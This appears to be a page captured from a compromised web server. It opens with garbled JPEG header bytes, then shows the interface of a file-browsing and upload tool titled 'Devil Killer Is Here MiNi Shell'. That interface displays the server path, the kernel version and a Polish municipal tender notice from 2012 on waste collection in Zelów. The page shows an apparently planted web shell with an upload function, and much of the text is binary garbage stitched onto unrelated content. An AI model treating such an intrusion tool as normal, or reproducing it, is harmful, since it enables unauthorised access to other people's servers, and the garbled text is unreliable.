JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120124/22944-N-2012.html

<p class="kh_header"><b>Zelów: Utrzymanie i obsługa gminnego punktu zbiórki odpadów.</b><br>
<b>Numer ogłoszenia: 22944 - 2012; data zamieszczenia: 24.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Zelów , ul. Żeromskiego 23, 97-425 Zelów, woj. łódzkie, tel. 0 44 634 10 00, faks 0 44 634 13 41.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zelow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie i obsługa gminnego punktu zbiórki odpadów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> ZADANIE 1
Dot: Gminnego Punktu Zbiórki Odpadów segregowanych i wielkogabarytowych.

1.   Przedmiotem zamówienia jest  utrzymanie i obsługa gminnego punktu zbiórki odpadów
      segregowanych i wielkogabarytowych położonego na terenie Gminy Zelów ( symbol CPV
      90500000-2) w roku 2012.
2.   Lokalizacja punktu i właściciel:
      Gmina Zelów - przy oczyszczalni ścieków dla miasta Zelowa, Mauryców 1a. 97-425 Zelów. 
2.1. Zakres czynności obejmuje:
2.2. Zapewnienie pracy punktu w wymiarze minimum 40 godzin tygodniowo, w tym soboty nie mniej niż 4 godziny. Rozkład czasu pracy powinien zaspokoić potrzeby mieszkańców gminy i być uzgodniony  z właścicielem punktu.
2.3. Nieodpłatny odbiór odpadów segregowanych i wielkogabarytowych,  pochodzących z gospodarstw indywidualnych z terenu gminy Zelów, które posiadają zawartą umowę na odbiór odpadów.
2.4. Pokrywaniem kosztów związanych z działalnością punktu.
2.5. Wyposażenie punktu na czas obowiązywania umowy w dodatkowe narzędzia lub pojemniki w sytuacji, gdy wymagać będzie tego asortyment odpadów odbieranych przez oferenta, a wyposażenie punktu nie będzie wystarczające.
2.6. Prowadzenie rejestru przyjmowanych w punkcie odpadów, zawierającego między innymi
 informacje o rodzaju , kodzie, masie lub ilości odebranych odpadów, dacie ich dostarczenia do punktu oraz sposobie ich dalszego wykorzystania.
2.7. Składanie zamawiającemu kwartalnego sprawozdania zawierającego:
a)	informacje o rodzaju, kodzie, masie lub ilości odebranych odpadów
b)	dacie ich dostarczenia do punktu oraz sposobie ich dalszego wykorzystania.
2.8. Prowadzenie działalności propagującej funkcjonowanie punktu.
3.   Oferent, z którym zostanie zawarta umowa, zobowiązany będzie do przejęcia gminnego punktu od właściciela  oraz zdania go Właścicielowi . Przejęcie i zdanie gminnego punktu odbywać się będzie w oparciu o protokół zdawczo-odbiorczy, którego kopie realizujący zamówienie przekaże Zamawiającemu. Przekazanie protokołu  do dnia 15 stycznia 2013 roku  i kluczy od GPZOSiW jest warunkiem  ostatecznego rozliczenia się z realizującym zadanie.
4.   Celem dokładnego poznania przedmiotu zamówienia oferent winien skontaktować się z
      właścicielem punktu wymienionym w punkcie 2.
 
 	

ZADANIE 2
Dot: zorganizowania i obsługi systemu selektywnej zbiórki odpadów komunalnych gromadzonych w ogólnodostępnych punktach na terenie Miasta i Gminy Zelów

1. Przedmiotem zamówienia jest zorganizowanie i obsługa systemu selektywnej zbiórki odpadów komunalnych gromadzonych w ogólnodostępnych punktach na terenie miasta i gminy Zelów (symbol CPV 90500000-2), w skład którego wchodzić będzie:

1.1. sieć punktów wyposażonych w pojemniki do selektywnej  zbiórki odpadów z opakowań szklanych;
1.2  sieć punktów  wyposażonych w pojemniki do selektywnej zbiórki odpadów z opakowań tworzyw sztucznych ;
1.3. sieć punktów wyposażonych w pojemniki do selektywnej zbiórki odpadów z papieru i tektury;

2.   Zakres czynności obejmuje:

a).  zabezpieczenie pojemników i rozmieszczenie ich w punktach zbiórki odpadów.  
b). odbiór odpadów z punktów ich zbiórki (czynność ta obejmuje również załadunek na środki
      transportu). 
c).  przewóz odpadów na trasie punkt zbiórki - wyspecjalizowany odbiorca (w tym rozładunek u odbiorcy);
d).  dostarczenie pojemników do miejsc, z których zostały zabrane (jeżeli transport odpadów
      odbywał się w pojemnikach stanowiących wyposażenie punktów zbiórki);
e).  sprzątanie terenu z  odpadów, które znajdują się w pobliżu pojemnika;
f).  myciu pojemników 1 raz w roku w okresie wiosennym - kwiecień , maj  (tylko w przypadku pojemników przeznaczonych do selektywnej zbiórki opakowań szklanych i odpadów z papieru i makulatury)
g).  naprawę szkód powstałych w trakcie wykonywania czynności wymienionych w punktach a, b c, d, e oraz, f
3. Czynności wymienione w punktach: 2. litera b, c, e; winny być wykonywane z częstotliwością:
- pojemniki na makulaturę i szkło - 1 raz w miesiącu;
- pojemniki na opakowania z tworzyw sztucznych na terenach wiejskich gminy- od maja do września 2 razy w miesiącu, w pozostałych miesiącach 1 raz ;
- pojemniki na opakowania z tworzyw sztucznych terenach miasta Zelowa od maja do września 3 razy  w miesiącu, w  pozostałych miesiącach  2 razy, a czynności opisane w punkcie 2 litera g, według potrzeb lecz nie później niż 7 dni od daty powstania szkody.
4. Składanie kwartalnych  sprawozdań zawierających:
 4.1. rodzaj i ilość zebranych odpadów.  
5. Przekazanie Zamawiającemu w ciągu siedmiu dni po zakończeniu realizacji zamówienia
  (kwartału) sprawozdania kwartalnego zawierającego informacje dotyczące:
5.1.  rodzaju i ilości odpadów opakowaniowych zebranych w punktach zbiórki;
5.2.  rodzaju i ilości odpadów opakowaniowych przekazanych do odzysku i recyklingu;
5.3.  odbiorcy odpadów podlegających przetworzeniu.

ZADANIE 3
Dot: usługi związanej z odbiorem z terenu  Gminy Zelów odpadów zawierających azbest.
 
1.Przedmiotem zamówienia jest usuwanie w roku 2012 z terenu Gminy Zelów odpadów zawierających azbest (symbol CPV 90650000-8 ).
2.  Do obowiązków Wykonawcy usługi należeć będzie:
a). odbiór odpadów z miejsc zbiórki wskazanych przez Zamawiającego, zabezpieczonych folią i znajdujących się na paletach drewnianych. Palety drewniane winny być udostępnione przez Wykonawcę i znajdować się na wyposażeniu GPZOSiW. 
b). uprzątnięcie miejsc po załadunku odpadów w terminie nie później niż 7 dni od daty  
     zakończenia odbioru odpadów;
c). transport i przekazanie odpadów zgodnie z obowiązującymi przepisami do zakładu utylizacji;
d). przedłożenie Zamawiającemu sprawozdania z wykonania usług (w sprawozdaniu należy
     podać miejsca i ilości zebranych odpadów oraz dołączyć dokumenty potwierdzające odbiór odpadów przez zakład utylizacji).
4.   Zamówienie należy wykonać w okresie od dnia podpisania umowy do 31 grudnia 2012r.
5.  Cena podana przez Wykonawcę w ofercie za wykonanie niniejszego zadania powinna zostać skalkulowana przy założeniu, że  przez okres obowiązywania umowy zostanie wywiezione 40 Mg azbestu.
ZADANIE 4
Przedmiotem zamówienia jest obwoźna zbiórka odpadów  wielkogabarytowych w roku 2012 z terenu  Gminy Zelów (symbol CPV 90500000-2. Obszar miasta i terenów wiejskich ).
Do obowiązków Wykonawcy usługi należeć będzie: 
- zorganizowanie dwa razy w roku (w m-cu maju i listopadzie) zbiórki obwoźnej odpadów wielkogabarytowych, polegającej na przejeździe specjalistycznymi samochodami przez wszystkie miejscowości wchodzące w skład poszczególnych jednostek administracyjnych Gminy Zelów, w tym przez wszystkie ulice zlokalizowane na terenie miasta Zelowa według ustalonego  harmonogramu:
-  odbiór odpadów kod 20 01 31* - Leki cytotoksyczne i cytostatyczne: 20 01 32, Leki inne niż wymienione w 20 01 31 z dwóch pojemników poj. 120 l z częstotliwością min. 1 w miesiącu, ustawionych na terenie miasta Zelowa. Pojemniki na leki zapewni Zamawiający. 
-   opracowanie szczegółowego harmonogramu prac,
-   uzyskanie  akceptacji harmonogramu przez Zamawiającego,
-   złożenie zaakceptowanego harmonogramu w siedzibie Zamawiającego najpóźniej na 14 dni
    przed wyznaczonym terminem wykonania prac,
-   zebranie ( w tym załadunek na środek transportu) zgromadzonych odpadów, 
-   sprzątanie miejsca, z którego odbierane były odpady, 
-   usuwanie szkód powstałych w trakcie załadunku, transportu i wyładunku odpadów,
-   uzyskanie potwierdzenia wykonania prac u Zamawiającego, 
-   dostarczenie zebranych odpadów podczas obwoźnej zbiórki do instalacji, w których zebrane odpady będą poddane procesowi odzysku bądź unieszkodliwienia, 
-   złożenia sprawozdania z wykonanych prac nie później niż 7 dni po wykonaniu prac.
     W sprawozdaniu należy podać ilości zebranych odpadów w rozbiciu na poszczególne grupy.
UWAGA: w trakcie prac zbierane będą następujące odpady:
Rodzaje odpadów 						Kod
Tekstylia (dywany, tapicerka samochodowa)			20 01 11
Zużyty sprzęt AGD i RTV 						20 01 23, 20 01 36
Zużyte opony ( w tym pochodzące z maszyn rolniczych) 		20 03 99
Baterie i akumulatory 						20 01 33, 20 01 34
Złom metalowy 							20 01 40
Przeterminowane lekarstwa 					20 01 32
Elementy z tworzyw sztucznych nie mieszczące się w
pojemnikach do segregacji w tym wykładziny podłogowe		20 01 39
Zużyte meble i elementy stolarki 					20 03 07

Przedmiot zamówienia nie obejmuje zbiórki gruzu, kamieni i odpadów pochodzących  z zakładów rzemieślniczych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.50.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium w niniejszym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca załączy: 
- zezwolenie wydane w oparciu o ustawę z 13 września 1996 roku (t.j.: Dz. U. z 2005 r. nr 236 poz. 2008 z późn. zm.) o utrzymaniu czystości i porządku w gminach na zbiórkę i transport odpadów lub wpis do rejestru działalności regulowanej,
- zezwolenie na prowadzenie działalności w zakresie transportu odpadów, m.in. odpadów ADR oraz zawierających azbest - kod 170610, 170605, wydanego w oparciu o przepisy ustawy o odpadach , (t.j. : Dz. U. z 2010 nr 185 poz. 1243 z późn. zm.);

Ponadto Wykonawca powinien złożyć oświadczenie z art 22 ust 1 ustawy Pzp. 
Ocena na zasadzie:  spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie wykonania w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie minimum 2 usług  odpowiadających przedmiotowi zamówienia o wartości min. 120.000,00zł brutto każda. Ponadto Wykonawca powinien złożyć oświadczenie z art 22 ust 1 ustawy Pzp. 
Ocena na zasadzie:  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca winien jest wykazać, ponadto, iż Wykonawca powinien złożyć oświadczenie z art 22 ust 1 ustawy Pzp. 
Ocena na zasadzie:  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca winien jest wykazać, ponadto, iż Wykonawca powinien złożyć oświadczenie z art 22 ust 1 ustawy Pzp. 
Ocena na zasadzie:  spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie wymagań, których spełnianie Wykonawca winien jest wykazać, ponadto, iż Wykonawca powinien złożyć oświadczenie z art 22 ust 1 ustawy Pzp. 
Ocena na zasadzie:  spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy załącznik nr 1 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W związku z art. 144 ustawy Pzp Zamawiający przewiduje możliwość zmiany istotnych postanowień umowy w stosunku do treści oferty, gdy :
1)	nastąpią zmiany ustawowe przepisów w tym podatkowych ,
2)	zaistnieją zdarzenia o charakterze siły wyższej, niezależne od stron umowy, które uniemożliwiłyby terminowe wykonanie zobowiązań. Strony zobowiązują się do ustalenia odpowiednio  zmienionego terminu wykonania przedmiotu umowy. Za siłę wyższą uważa się zdarzenie zewnętrzne, którego skutków nie da się przewidzieć ani im zapobiec.
3)	Zamawiający dopuszcza możliwość zmian terminów wynikających z umowy w przypadku natrafienia przez wykonawcę usługi na znaleziska archeologiczne w czasie wykonywania robót, jeżeli w wyniku powyższego wystąpiły opóźnienia w robotach.
4)	Wszelkie zmiany umowy wymagają pod rygorem nieważności formy pisemnej.
5)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy. Ponadto Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, których oferta zostanie uznana za najkorzystniejszą są zobowiązani dostarczyć dokument, o którym mowa w pkt 10.3 Instrukcji (IDW).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zelow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Zelów - Urząd Miejski w Zelowie, ul. Żeromskiego 23, 97-425 Zelów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2012 godzina 12:00, miejsce: Gmina Zelów - Urząd Miejski w Zelowie, ul. Żeromskiego 23, 97-425 Zelów, pokój numer 118-119.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com